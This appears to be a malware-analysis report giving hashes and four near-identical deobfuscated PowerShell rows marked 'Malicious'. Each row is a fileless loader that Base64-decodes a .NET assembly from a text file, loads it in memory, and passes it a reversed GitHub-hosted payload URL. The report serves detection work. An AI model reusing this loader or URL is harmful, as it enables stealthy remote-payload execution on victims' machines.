| Hash | Hash Value |
|---|---|
| MD5 | 986254c4e7965203bf831482c95c5a43 |
| Sha1 | 44dde94caf0f2755ce4864302efdf529bcb95f4b |
| Sha256 | 9e64eab0015911243a17b43f5a4bdbbf41516b1063fc70722acb3d8492434dd2 |
| Sha384 | 5f02607f19487acac003b5ebdef9f5bfe6654d25ecacd3797d30cd0fb036f1b49c630a394d1eaae96fbe7a7f9685387d |
| Sha512 | 0df87359758dcc3dc40e6112fb8532b19aa863c6dbb2eeb090f5048e994e0a912e854c7a412560a00eba1c1732b19569cd32eeeaf684e617226605e4aeb7a2b4 |
| SSDeep | 24:Q0D1O/4+yu5b7nxByg5BI8lPMPMuZJYMwA64Ivt55XhXQ:PA4UnxZ5dM0sg55hA |
| TLSH | C711C410AAEC810971736F09C3BEA1641477FA2DAD72CB0D0414D04D06B3A48DDB7F72 |
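
Analyst note: in the rows below, `$txIeN` holds a URL stored with its characters reversed (the string ends in `//:sptth`). The script reads `C:\ProgramData\dSvwn.txt`, replaces each `=========` with `A`, Base64-decodes the result and loads it into the current AppDomain as a .NET assembly, so at this stage the assembly is loaded from a byte array rather than from an executable file; the text file, the PowerShell script-block content and the `Load` call are the observable artifacts. The `&` characters in the `System1.vbs` path are presumably stand-ins for backslashes. The four rows differ only in how the final argument array is wrapped.

| Name | Value |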
|---|---|
| Deobfuscated PowerShell | $txIeN = "txt.ism_ksat/niam/sdaeh/sfer/sovihcra-sim/gpj-626262relgneps/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\dSvwn.txt" $Ogmegc = (Get-Content -Path $x -Encoding "UTF8") $Ogmegc = $Ogmegc."replace"("=========", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($Ogmegc) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.Gqga")."GetMethod"("NRJOMS")."Invoke"($yNlUO, [object[]] (@(($txIeN), "C:&Users&Admin&AppData&Local&Temp&System1.vbs", "OEzTJC", "03", "1", "caca"))) |
| Deobfuscated PowerShell | $txIeN = "txt.ism_ksat/niam/sdaeh/sfer/sovihcra-sim/gpj-626262relgneps/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\dSvwn.txt" $Ogmegc = (Get-Content -Path $x -Encoding "UTF8") $Ogmegc = $Ogmegc."replace"("=========", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($Ogmegc) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.Gqga")."GetMethod"("NRJOMS")."Invoke"($yNlUO, [object[]] (@({ @(($txIeN), "C:&Users&Admin&AppData&Local&Temp&System1.vbs", "OEzTJC", "03", "1", "caca") } ))) |
| Deobfuscated PowerShell | $txIeN = "txt.ism_ksat/niam/sdaeh/sfer/sovihcra-sim/gpj-626262relgneps/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\dSvwn.txt" $Ogmegc = (Get-Content -Path $x -Encoding "UTF8") $Ogmegc = $Ogmegc."replace"("=========", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($Ogmegc) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.Gqga")."GetMethod"("NRJOMS")."Invoke"($yNlUO, [object[]] @({ @(($txIeN), "C:&Users&Admin&AppData&Local&Temp&System1.vbs", "OEzTJC", "03", "1", "caca") } )) |
| Deobfuscated PowerShell | $txIeN = "txt.ism_ksat/niam/sdaeh/sfer/sovihcra-sim/gpj-626262relgneps/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\dSvwn.txt" $Ogmegc = (Get-Content -Path $x -Encoding "UTF8") $Ogmegc = $Ogmegc."replace"("=========", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($Ogmegc) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.Gqga")."GetMethod"("NRJOMS")."Invoke"($yNlUO, [object[]] @({ @(($txIeN), "C:&Users&Admin&AppData&Local&Temp&System1.vbs", "OEzTJC", "03", "1", "caca") } )) |

| Name | Value | Location |
|---|---|---|
| Deobfuscated PowerShell | $txIeN = "txt.ism_ksat/niam/sdaeh/sfer/sovihcra-sim/gpj-626262relgneps/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\dSvwn.txt" $Ogmegc = (Get-Content -Path $x -Encoding "UTF8") $Ogmegc = $Ogmegc."replace"("=========", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($Ogmegc) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.Gqga")."GetMethod"("NRJOMS")."Invoke"($yNlUO, [object[]] (@(($txIeN), "C:&Users&Admin&AppData&Local&Temp&System1.vbs", "OEzTJC", "03", "1", "caca"))) Malicious | 986254c4e7965203bf831482c95c5a43 |
| Deobfuscated PowerShell | $txIeN = "txt.ism_ksat/niam/sdaeh/sfer/sovihcra-sim/gpj-626262relgneps/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\dSvwn.txt" $Ogmegc = (Get-Content -Path $x -Encoding "UTF8") $Ogmegc = $Ogmegc."replace"("=========", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($Ogmegc) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.Gqga")."GetMethod"("NRJOMS")."Invoke"($yNlUO, [object[]] (@({ @(($txIeN), "C:&Users&Admin&AppData&Local&Temp&System1.vbs", "OEzTJC", "03", "1", "caca") } ))) Malicious | 986254c4e7965203bf831482c95c5a43 > [Deobfuscated PS] |
| Deobfuscated PowerShell | $txIeN = "txt.ism_ksat/niam/sdaeh/sfer/sovihcra-sim/gpj-626262relgneps/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\dSvwn.txt" $Ogmegc = (Get-Content -Path $x -Encoding "UTF8") $Ogmegc = $Ogmegc."replace"("=========", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($Ogmegc) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.Gqga")."GetMethod"("NRJOMS")."Invoke"($yNlUO, [object[]] @({ @(($txIeN), "C:&Users&Admin&AppData&Local&Temp&System1.vbs", "OEzTJC", "03", "1", "caca") } )) Malicious | 986254c4e7965203bf831482c95c5a43 > [Deobfuscated PS] > [Deobfuscated PS] |
| Deobfuscated PowerShell | $txIeN = "txt.ism_ksat/niam/sdaeh/sfer/sovihcra-sim/gpj-626262relgneps/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\dSvwn.txt" $Ogmegc = (Get-Content -Path $x -Encoding "UTF8") $Ogmegc = $Ogmegc."replace"("=========", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($Ogmegc) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.Gqga")."GetMethod"("NRJOMS")."Invoke"($yNlUO, [object[]] @({ @(($txIeN), "C:&Users&Admin&AppData&Local&Temp&System1.vbs", "OEzTJC", "03", "1", "caca") } )) Malicious | 986254c4e7965203bf831482c95c5a43 > [Deobfuscated PS] > [Deobfuscated PS] > [Deobfuscated PS] |